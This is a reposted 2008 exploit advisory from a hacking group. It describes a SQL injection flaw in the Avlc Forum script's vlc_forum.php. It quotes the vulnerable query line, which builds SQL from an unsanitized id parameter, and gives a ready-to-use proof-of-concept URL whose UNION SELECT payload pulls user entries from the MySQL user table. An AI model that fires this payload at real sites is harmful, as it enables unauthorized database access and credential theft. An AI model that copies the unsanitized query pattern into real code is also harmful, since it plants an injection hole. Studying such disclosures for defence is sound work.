Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

2023-12-04 0 355

====================================================================

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

====================================================================

,–^———-,——–,—–,——-^–,

| ||||||||| `——–\’ | O .. CWH Underground Hacking Team ..

` —————————^———-|

`\\_,——-, _________________________|

/ XXXXXX /`| /

/ XXXXXX / `\\ /

/ XXXXXX /\\______(

/ XXXXXX /

/ XXXXXX /

(________(

`——\’

AUTHOR : CWH Underground

DATE : 12 July 2008

SITE : cwh.citec.us

#####################################################

APPLICATION : Avlc Forum

VERSION : N/A

VENDOR : N/A

DOWNLOAD : http://www.easy-script.com/compt.php?id=2147

#####################################################

— Remote SQL Injection —

———————————

Vulnerable File [vlc_forum.php]

———————————

@Line

141: $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id";

142: $req = mysql_query($sql) or die(\’Erreur SQL !\’.$sql.\'<br>\’ . mysql_error());

————-

POC Exploit

————-

[ ] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user–

#####################################################################

Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos

Special Thx : asylu3, str0ke, citec.us, milw0rm.com

#####################################################################

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 Exploit Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability https://www.u-9.cn/security/exploit/71856.html

常见问题

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务